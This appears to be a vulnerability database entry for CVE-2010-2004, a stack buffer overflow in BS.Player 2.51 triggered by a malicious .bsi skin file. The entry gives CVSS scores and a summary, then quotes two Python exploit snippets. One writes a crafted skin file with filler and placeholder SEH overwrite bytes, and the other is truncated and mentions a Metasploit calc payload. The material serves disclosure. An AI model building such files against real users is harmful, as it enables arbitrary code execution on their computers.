
CVE-2010-2004

Published: 20/05/2010 Updated: 17/08/2017
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 940
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Stack-based buffer overflow in BS.Global BS.Player 2.51 Build 1022 Free, and possibly other versions, allows user-assisted remote malicious users to execute arbitrary code via the Skin parameter in the Options section of a skins file (.bsi), a different vulnerability than CVE-2009-1068.

Vulnerable Product

bsplayer bs.player 2.51

Exploits

# Exploit Title: BSPlayer v2.51 Universal SEH Overflow Exploit
# Date: 15/01/2010
# Author: Dz_attacker
# Version: 2.51
# Tested on: Windows xp sp3
# Code :
# Discover : mertsarica
# Exploit : Dz_Attacker (dz_attacker@hotmail.fr)
junk = "[Options]\nSkin="
# win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum metasploit ...

# BSPlayer v2.51
# Software Link: www.bsplayer.com/bsplayer-english/download-free.html
# SEH Overwrite Vulnerability
# www.mertsarica.com
junk = "[Options]\nSkin="
vulnerability = junk + "\x41"*496 + "\x42"*4 + "\x43"*4
try:
    vulnerable = open("vulnerable.bsi",'w')
    vulnerable.write(vulnerability)
    vulnerable.close()
...